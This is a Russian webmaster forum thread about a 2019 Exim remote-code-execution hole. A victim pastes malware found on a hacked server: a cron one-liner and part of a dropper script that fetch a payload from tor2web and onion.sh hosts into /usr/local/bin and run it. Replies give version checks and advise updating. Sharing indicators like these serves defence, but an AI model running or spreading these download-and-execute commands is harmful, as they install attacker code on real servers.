Уязвимость очень высокого уровня в exim
Страницы: 1
Уязвимость очень высокого уровня в exim, Проверяем свои сервера и устанавливаем обновление срочно!
10 июня примерно в 2.52 по мск один мой сервер был взломан данным способом скрин 1 [url]https://prnt.sc/nzqmhf[/url] скрин 2 [url]https://prnt.sc/nzq1ta[/url]
Заметил, что сайт упал 502 ошибкой начал смотреть заметил потухшие службы (скрин 2) в процессах висело такое

Код
[CODE]  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
10543 root      20   0  430524   7636    652 S 399.3  0.0 256:26.18 [kthrotlds]
   42 root      rt   0       0      0      0 S   0.3  0.0   0:00.01 watchdog/7
29601 mysql     20   0 2281312 274392   5496 S   0.3  0.4   0:00.28 mysqld
в кроне такой код был

Код
tbin=$(command -v passwd); bpath=$(dirname "${tbin}"; curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi;  (${curl}  -fsSLk --connect-timeout 26 --max-time 75  https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o /usr/local/bin/npt||${curl}  -fsSLk --connect-timeout 26 --max-time 75  https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /usr/local/bin/npt||${curl}  -fsSLk --connect-timeout 26 --max-time 75  https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /usr/local/bin/npt||${wget}  --quiet --no-check-certificate --connect-timeout=26 --timeout=75  https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /usr/local/bin/npt||${wget}  --quiet --no-check-certificate --connect-timeout=26 --timeout=75  https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -O /usr/local/bin/npt||${wget}  --quiet --no-check-certificate --connect-timeout=26 --timeout=75  https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -O /usr/local/bin/npt) && chmod +x /usr/local/bin/npt && /bin/sh /usr/local/bin/npt

В данный момент собираю новый сервер на старом пока сайт висит с обрубленным кроном, что именно успели сделать пока выясняю и не лечил

Код
wget http://lechillka.firstvds.ru/exim_rce_fixer.sh && chmod +x exim_rce_fixer.sh && ./exim_rce_fixer.sh
 и не уверен что всё вылечит решил новый сервер собрать.

В созданных файлах можно найти такой код 

Код
#!/bin/bash

SPOOLDIR=/var/spool/exim

cd $SPOOLDIR/db
for a in retry misc wait-* callout ratelimit; do
    [ -r "$a" ] || continue
    [ "${a%%.lockfile}" = "$a" ] || continue
    /usr/sbin/exim_tidydb $SPOOLDIR $a >/dev/null
done
или такой

Код
#!/bin/sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
RHOST="https://an7kmd2wp4xo7hpr"
TOR1=".tor2web.su/"
TOR2=".tor2web.io/"
TOR3=".onion.sh/"
RPATH1='src/ldm'
#LPATH="${HOME-/tmp}/.cache/"
TIMEOUT="75"
CTIMEOUT="22"
COPTS=" -fsSLk --retry 2 --connect-timeout ${CTIMEOUT} --max-time ${TIMEOUT} "
WOPTS=" --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=${CTIMEOUT} --timeout=${TIMEOUT} "
tbin=$(command -v passwd); bpath=$(dirname "${tbin}"
curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi
wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q ".wgetrc'-style command" && wget="$f" && break; done; fi; fi
#CHKCURL='curl="curl "; wget="wget "; if [ "$(whoami)" = "root" ]; then if [ $(command -v curl|wc -l) -eq 0 ]; then curl=$(ls /usr/bin|grep -i url|head -n 1); fi; if [ -z ${curl} ]; then curl="echo "; fi; if [ $(command -v wget|wc -l) -eq 0 ]; then wget=$(ls /usr/bin|grep -i wget|head -n 1); fi; if [ -z ${wget} ]; then wget="echo "; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; fi; '
CHKCURL='tbin=$(command -v passwd); bpath=$(dirname "${tbin}"; curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; '
LBIN8="kthrotlds"
null=' >/dev/null 2>&1'
sudoer=1
sudo=''
if [ "$(whoami)" != "root" ]; then
    sudo="sudo "
    timeout 1 sudo echo 'kthreadd' 2>/dev/null && sudoer=1||{ sudo=''; sudoer=0; }
.................Не помещается ))...............

Может кому пригодится.
Подробно описано здесь https://firstvds.ru/blog/uyazvimost-v-pochtovom-servere-exim
Рекомендую хостинг в России от 115р.
Рекомендую хостинг в Европе от 70р.
Интернет-магазин

Прогон по твиттеру, постинг в 1500 аккунтов
Постинг в твиттер аккаунты, для ускорения индексации ваших сайтов, сателлитов, дорвеев.

Тоже вчера от хостера письмо получил по этому поводу. Как вы думаете отключение этой службы решит проблему или обязательно обновляться?
Цитата
андрей ирмишин пишет:
Тоже вчера от хостера письмо получил по этому поводу. Как вы думаете отключение этой службы решит проблему или обязательно обновляться?
Я думаю лучше обновиться, или вообще удалить с сервера если не пользуетесь.
Сначала проверьте свою версию Exim:

Debian/Ubuntu:
dpkg --list |grep exim 
CentOS:
rpm -qa |grep exim
У многих до сих пор версия 4,86, которую обновлять не обязательно пока. Да и значит вас проблема не коснулась. Проблема у: 4.87 до 4.91.
Изменено: Александр - 13 Июня 2019 15:11
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
17:04 ClickTimes.ru - самая выгодная монетизация WAP трафика 
14:19 Предлагаем посмотреть порно ролики даром - pornosexrolik.com 
12:46 Зарабатывай до 50% за сейл с партнерской программой EssayPro! 
09:13 Что можно улучшить 
22:34 Продвижение в ТОП Яндекс. Мега быстро! 
14:28 Berileads.ru - финансовая партнерская программа. 
19:38 Обновление поисковой базы 10.06.2019. 
17:03 Семантическое ядро по новой технологии + LSI с ручной группировкой 
15:29 Услуги постинга в социальные сети для продвижения, индексации и увеличения социальной активности 
14:45 Пишу софт, регеры, парсеры, рвссыльщики, граберы и пр на заказ 
12:53 "Спалю" тему как рекламироваться в Яндекс.Директ по гэмблинг (и другим) тематикам, помогу с прохождением модерации, отдам домен. 
10:59 Прогон по личной базе, больше 1000 трастовых сайтов! Продвижение СЧ и НЧ запросов + рост показателей! Гарантии! 
09:20 Продвижение сайтов максимально качественно, методы только белые, есть крутые кейсы!!! 
09:06 Пожалуйста оцените сайт форум 
17:33 Наши машинки 
23:58 Сколько можно заработать на сайте с 60к уник траффом в день 
21:36 В поисках ПП (Партнёрской Программы) 
17:56 Инвайт на webmaster.ru please! 
15:05 Букмекерские ставки 
15:03 Деньги на бизнес 
09:40 Сколько вы платите редактору?